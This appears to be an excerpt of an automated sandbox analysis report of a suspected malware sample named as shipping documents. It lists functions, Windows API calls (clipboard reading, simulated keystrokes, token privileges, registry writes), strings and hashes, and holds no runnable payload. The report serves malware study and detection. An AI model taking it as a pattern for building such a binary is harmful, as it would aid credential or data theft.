                                                • Instruction ID: ccb70c201101b5b4bae98aa7fc2fa18b6a425d40f5861327d83c14e84b14a914
                                                • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                • Instruction Fuzzy Hash: 83E0E67494410EDFDB00EFB4D54969E7FB4FF04301F100161FD05D2281D6309D508A72

                                                Non-executed Functions

                                                Function 0071CDAC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 637windowkeyboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00692612: GetWindowLongW.USER32(?,000000EB), ref: 00692623
                                                • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0071CE50
                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0071CE91
                                                • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0071CED6
                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0071CF00
                                                • SendMessageW.USER32 ref: 0071CF29
                                                • _wcsncpy.LIBCMT ref: 0071CFA1
                                                • GetKeyState.USER32(00000011), ref: 0071CFC2
                                                • GetKeyState.USER32(00000009), ref: 0071CFCF
                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0071CFE5
                                                • GetKeyState.USER32(00000010), ref: 0071CFEF
                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0071D018
                                                • SendMessageW.USER32 ref: 0071D03F
                                                • SendMessageW.USER32(?,00001030,?,0071B602), ref: 0071D145
                                                • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0071D15B
                                                • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0071D16E
                                                • SetCapture.USER32(?), ref: 0071D177
                                                • ClientToScreen.USER32(?,?), ref: 0071D1DC
                                                • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0071D1E9
                                                • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0071D203
                                                • ReleaseCapture.USER32 ref: 0071D20E
                                                • GetCursorPos.USER32(?), ref: 0071D248
                                                • ScreenToClient.USER32(?,?), ref: 0071D255
                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0071D2B1
                                                • SendMessageW.USER32 ref: 0071D2DF
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0071D31C
                                                • SendMessageW.USER32 ref: 0071D34B
                                                • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0071D36C
                                                • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0071D37B
                                                • GetCursorPos.USER32(?), ref: 0071D39B
                                                • ScreenToClient.USER32(?,?), ref: 0071D3A8
                                                • GetParent.USER32(?), ref: 0071D3C8
                                                • SendMessageW.USER32(?,00001012,00000000,?), ref: 0071D431
                                                • SendMessageW.USER32 ref: 0071D462
                                                • ClientToScreen.USER32(?,?), ref: 0071D4C0
                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0071D4F0
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 0071D51A
                                                • SendMessageW.USER32 ref: 0071D53D
                                                • ClientToScreen.USER32(?,?), ref: 0071D58F
                                                • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0071D5C3
                                                  • Part of subcall function 006925DB: GetWindowLongW.USER32(?,000000EB), ref: 006925EC
                                                • GetWindowLongW.USER32(?,000000F0), ref: 0071D65F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                • String ID: @GUI_DRAGID$F$pru
                                                • API String ID: 3977979337-1757834283
                                                • Opcode ID: db530cdfa1664be9a4746830553ac781756bfe70fdcd442ed92498b2011c03e3
                                                • Instruction ID: 0b3f3bd46255c524ab4cf43aa59dfab1ef70ec73971618ee68c6f8c635fac186
                                                • Opcode Fuzzy Hash: db530cdfa1664be9a4746830553ac781756bfe70fdcd442ed92498b2011c03e3
                                                • Instruction Fuzzy Hash: 7A428B30244341AFCB21CF6CC844AEABBE6FF48314F14461DF6958B2E0C779A894CB96
                                                Function 0071804A Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0071873F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID: %d/%02d/%02d
                                                • API String ID: 3850602802-328681919
                                                • Opcode ID: 7ade9d95d36e862d5afc7f248caf782d1e4ca27e97e19e73e435a9b51df88485
                                                • Instruction ID: 0663cabf886bae5c31ee17057de3923a9d5b763dc4611f23d5ff06d3abe24673
                                                • Opcode Fuzzy Hash: 7ade9d95d36e862d5afc7f248caf782d1e4ca27e97e19e73e435a9b51df88485
                                                • Instruction Fuzzy Hash: 6312D171500208ABEB658F6CDC49FEE7BB9EF45310F248129F915EA2E1DF788981CB15
                                                Function 006A710E Relevance: 52.3, APIs: 19, Strings: 8, Instructions: 5093COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: _memmove$_memset
                                                • String ID: 0wt$DEFINE$Oaj$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                • API String ID: 1357608183-2205864362
                                                • Opcode ID: 75021460f783c9530a60ff08c3cf8c7ebf746ec5977c9732c6be2522bc6c30b2
                                                • Instruction ID: 51448f88183cef9867b48a790b62ab14ee4e0f69856570e3b4551f64c6093d41
                                                • Opcode Fuzzy Hash: 75021460f783c9530a60ff08c3cf8c7ebf746ec5977c9732c6be2522bc6c30b2
                                                • Instruction Fuzzy Hash: 89939071A013569FDB24DF69C8957EDB7B2FF48310F25816AE945AB380E7709E82CB40
                                                Function 00694A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetForegroundWindow.USER32(00000000,?), ref: 00694A3D
                                                • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006CDA8E
                                                • IsIconic.USER32(?), ref: 006CDA97
                                                • ShowWindow.USER32(?,00000009), ref: 006CDAA4
                                                • SetForegroundWindow.USER32(?), ref: 006CDAAE
                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 006CDAC4
                                                • GetCurrentThreadId.KERNEL32 ref: 006CDACB
                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 006CDAD7
                                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 006CDAE8
                                                • AttachThreadInput.USER32(?,00000000,00000001), ref: 006CDAF0
                                                • AttachThreadInput.USER32(00000000,?,00000001), ref: 006CDAF8
                                                • SetForegroundWindow.USER32(?), ref: 006CDAFB
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 006CDB10
                                                • keybd_event.USER32(00000012,00000000), ref: 006CDB1B
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 006CDB25
                                                • keybd_event.USER32(00000012,00000000), ref: 006CDB2A
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 006CDB33
                                                • keybd_event.USER32(00000012,00000000), ref: 006CDB38
                                                • MapVirtualKeyW.USER32(00000012,00000000), ref: 006CDB42
                                                • keybd_event.USER32(00000012,00000000), ref: 006CDB47
                                                • SetForegroundWindow.USER32(?), ref: 006CDB4A
                                                • AttachThreadInput.USER32(?,?,00000000), ref: 006CDB71
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                • String ID: Shell_TrayWnd
                                                • API String ID: 4125248594-2988720461
                                                • Opcode ID: d6024270380d9d290307c3f1ddc3f8dd93ac5e9dee4ca4a71ecbe8ac7ea70fc1
                                                • Instruction ID: 79f45ff366acbe7acf21e97d704d479da88300c0e3d4e8d97e7193f05ffbdf50
                                                • Opcode Fuzzy Hash: d6024270380d9d290307c3f1ddc3f8dd93ac5e9dee4ca4a71ecbe8ac7ea70fc1
                                                • Instruction Fuzzy Hash: 7531A871A40318BFEB206FA59C49FBF7E6DEB44B50F11803AFA04E61D1C6B45D11ABA4
                                                Function 006E8858 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 006E8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006E8D0D
                                                  • Part of subcall function 006E8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 006E8D3A
                                                  • Part of subcall function 006E8CC3: GetLastError.KERNEL32 ref: 006E8D47
                                                • _memset.LIBCMT ref: 006E889B
                                                • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 006E88ED
                                                • CloseHandle.KERNEL32(?), ref: 006E88FE
                                                • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 006E8915
                                                • GetProcessWindowStation.USER32 ref: 006E892E
                                                • SetProcessWindowStation.USER32(00000000), ref: 006E8938
                                                • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 006E8952
                                                  • Part of subcall function 006E8713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,006E8851), ref: 006E8728
                                                  • Part of subcall function 006E8713: CloseHandle.KERNEL32(?,?,006E8851), ref: 006E873A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                                                • String ID: $default$winsta0
                                                • API String ID: 2063423040-1027155976
                                                • Opcode ID: e715a3ec4567f3fa77591689f3d0234bfb4cd5ec2220381afb41fe38ba81cbce
                                                • Instruction ID: 759bcce660c1c98f465c7ee51a8797927f993feadd66c216162428f5e9ced200
                                                • Opcode Fuzzy Hash: e715a3ec4567f3fa77591689f3d0234bfb4cd5ec2220381afb41fe38ba81cbce
                                                • Instruction Fuzzy Hash: 9D816F71902389AFDF11DFA9CC44AEE7B7AEF04304F14812AF914B72A1DB358A149B64
                                                Function 0070425A Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OpenClipboard.USER32(0071F910), ref: 00704284
                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 00704292
                                                • GetClipboardData.USER32(0000000D), ref: 0070429A
                                                • CloseClipboard.USER32 ref: 007042A6
                                                • GlobalLock.KERNEL32(00000000), ref: 007042C2
                                                • CloseClipboard.USER32 ref: 007042CC
                                                • GlobalUnlock.KERNEL32(00000000,00000000), ref: 007042E1
                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 007042EE
                                                • GetClipboardData.USER32(00000001), ref: 007042F6
                                                • GlobalLock.KERNEL32(00000000), ref: 00704303
                                                • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 00704337
                                                • CloseClipboard.USER32 ref: 00704447
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                • String ID:
                                                • API String ID: 3222323430-0
                                                • Opcode ID: 55a9221914be63e6fc48b36f4d29a83759165f1a3ef2657d4d9dd7b9d4d36c63
                                                • Instruction ID: c4a1f0807394e9a0e6b7b5c262e9c8ca31eb3ece576df1eaa1301273d6e2124d
                                                • Opcode Fuzzy Hash: 55a9221914be63e6fc48b36f4d29a83759165f1a3ef2657d4d9dd7b9d4d36c63
                                                • Instruction Fuzzy Hash: 4B518175204301ABD711EF68DC85FAE77A8BF84B10F00862DF656D21E1DF78D9048B6A
                                                Function 006FC9C7 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?), ref: 006FC9F8
                                                • FindClose.KERNEL32(00000000), ref: 006FCA4C
                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 006FCA71
                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 006FCA88
                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 006FCAAF
                                                • __swprintf.LIBCMT ref: 006FCAFB
                                                • __swprintf.LIBCMT ref: 006FCB3E
                                                  • Part of subcall function 00697F41: _memmove.LIBCMT ref: 00697F82
                                                • __swprintf.LIBCMT ref: 006FCB92
                                                  • Part of subcall function 006B38D8: __woutput_l.LIBCMT ref: 006B3931
                                                • __swprintf.LIBCMT ref: 006FCBE0
                                                  • Part of subcall function 006B38D8: __flsbuf.LIBCMT ref: 006B3953
                                                  • Part of subcall function 006B38D8: __flsbuf.LIBCMT ref: 006B396B
                                                • __swprintf.LIBCMT ref: 006FCC2F
                                                • __swprintf.LIBCMT ref: 006FCC7E
                                                • __swprintf.LIBCMT ref: 006FCCCD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                • API String ID: 3953360268-2428617273
                                                • Opcode ID: b4d5af5c1f3cdd2d459988ee536d43bdaaf7ed7010d934273f49eba38e65a8cb
                                                • Instruction ID: 6a5729d13863ed35329edea7f4bb304fa2a3035a2ce5a04dc32e99e4144b8cfa
                                                • Opcode Fuzzy Hash: b4d5af5c1f3cdd2d459988ee536d43bdaaf7ed7010d934273f49eba38e65a8cb
                                                • Instruction Fuzzy Hash: D6A13EB1518304ABCB40EB68C985DAFB7EDFF94700F40492DF586D3591EA34EA09CB66
                                                Function 006FF200 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 006FF221
                                                • _wcscmp.LIBCMT ref: 006FF236
                                                • _wcscmp.LIBCMT ref: 006FF24D
                                                • GetFileAttributesW.KERNEL32(?), ref: 006FF25F
                                                • SetFileAttributesW.KERNEL32(?,?), ref: 006FF279
                                                • FindNextFileW.KERNEL32(00000000,?), ref: 006FF291
                                                • FindClose.KERNEL32(00000000), ref: 006FF29C
                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 006FF2B8
                                                • _wcscmp.LIBCMT ref: 006FF2DF
                                                • _wcscmp.LIBCMT ref: 006FF2F6
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 006FF308
                                                • SetCurrentDirectoryW.KERNEL32(0074A5A0), ref: 006FF326
                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 006FF330
                                                • FindClose.KERNEL32(00000000), ref: 006FF33D
                                                • FindClose.KERNEL32(00000000), ref: 006FF34F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                • String ID: *.*
                                                • API String ID: 1803514871-438819550
                                                • Opcode ID: be71b2b7b5e638aa7316a0acc219bff103eea94c1397031aaac8a72a88e6e06e
                                                • Instruction ID: 2cd6c1ee3004d60d69798a09d7b29cb65ce070f20834eb407e064843589d3894
                                                • Opcode Fuzzy Hash: be71b2b7b5e638aa7316a0acc219bff103eea94c1397031aaac8a72a88e6e06e
                                                • Instruction Fuzzy Hash: F631E87660021D6ADB10DFB4DC49AEE73ADAF08360F108176E914E31D0EB74DA85CB58
                                                Function 00710AE2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00710BDE
                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,0071F910,00000000,?,00000000,?,?), ref: 00710C4C
                                                • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00710C94
                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00710D1D
                                                • RegCloseKey.ADVAPI32(?), ref: 0071103D
                                                • RegCloseKey.ADVAPI32(00000000), ref: 0071104A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Close$ConnectCreateRegistryValue
                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                • API String ID: 536824911-966354055
                                                • Opcode ID: f5e06cca9fbe9cd374b34a86b09a3b3369989fb2c32fe2caa83dc97acc666856
                                                • Instruction ID: de1c042d9b94a8e19ae25a4fdbbac4086ff116abd4695759f6a6b35d07d98091
                                                • Opcode Fuzzy Hash: f5e06cca9fbe9cd374b34a86b09a3b3369989fb2c32fe2caa83dc97acc666856
                                                • Instruction Fuzzy Hash: F502B3752046119FCB54EF18C881E6AB7EAFF88710F04845DF98A9B7A1CB34EC81CB95
                                                Function 006FF35D Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?,771A8FB0,?,00000000), ref: 006FF37E
                                                • _wcscmp.LIBCMT ref: 006FF393
                                                • _wcscmp.LIBCMT ref: 006FF3AA
                                                  • Part of subcall function 006F45C1: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 006F45DC
                                                • FindNextFileW.KERNEL32(00000000,?), ref: 006FF3D9
                                                • FindClose.KERNEL32(00000000), ref: 006FF3E4
                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 006FF400
                                                • _wcscmp.LIBCMT ref: 006FF427
                                                • _wcscmp.LIBCMT ref: 006FF43E
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 006FF450
                                                • SetCurrentDirectoryW.KERNEL32(0074A5A0), ref: 006FF46E
                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 006FF478
                                                • FindClose.KERNEL32(00000000), ref: 006FF485
                                                • FindClose.KERNEL32(00000000), ref: 006FF497
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                • String ID: *.*
                                                • API String ID: 1824444939-438819550
                                                • Opcode ID: 3d0c1c9b0f827c352de593b0675a8e5c08f5942e859cfc03e57688c49556b00c
                                                • Instruction ID: 5a0b7764a5e8b3239d93964d8129f68f64025a5ddd6296a4c7d7d30a155e2d4d
                                                • Opcode Fuzzy Hash: 3d0c1c9b0f827c352de593b0675a8e5c08f5942e859cfc03e57688c49556b00c
                                                • Instruction Fuzzy Hash: F531E77260521D6BDB109B78EC88AEE77AE9F09320F104175E910E32E1DB74DE84CA98
                                                Function 006E81F7 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 006E874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 006E8766
                                                  • Part of subcall function 006E874A: GetLastError.KERNEL32(?,006E822A,?,?,?), ref: 006E8770
                                                  • Part of subcall function 006E874A: GetProcessHeap.KERNEL32(00000008,?,?,006E822A,?,?,?), ref: 006E877F
                                                  • Part of subcall function 006E874A: HeapAlloc.KERNEL32(00000000,?,006E822A,?,?,?), ref: 006E8786
                                                  • Part of subcall function 006E874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 006E879D
                                                  • Part of subcall function 006E87E7: GetProcessHeap.KERNEL32(00000008,006E8240,00000000,00000000,?,006E8240,?), ref: 006E87F3
                                                  • Part of subcall function 006E87E7: HeapAlloc.KERNEL32(00000000,?,006E8240,?), ref: 006E87FA
                                                  • Part of subcall function 006E87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,006E8240,?), ref: 006E880B
                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 006E825B
                                                • _memset.LIBCMT ref: 006E8270
                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 006E828F
                                                • GetLengthSid.ADVAPI32(?), ref: 006E82A0
                                                • GetAce.ADVAPI32(?,00000000,?), ref: 006E82DD
                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 006E82F9
                                                • GetLengthSid.ADVAPI32(?), ref: 006E8316
                                                • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 006E8325
                                                • HeapAlloc.KERNEL32(00000000), ref: 006E832C
                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 006E834D
                                                • CopySid.ADVAPI32(00000000), ref: 006E8354
                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 006E8385
                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 006E83AB
                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 006E83BF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                • String ID:
                                                • API String ID: 3996160137-0
                                                • Opcode ID: 4d9f96ef544a9944823b02a6bd31e225b48503c3bf15859c49b37ee5960dd442
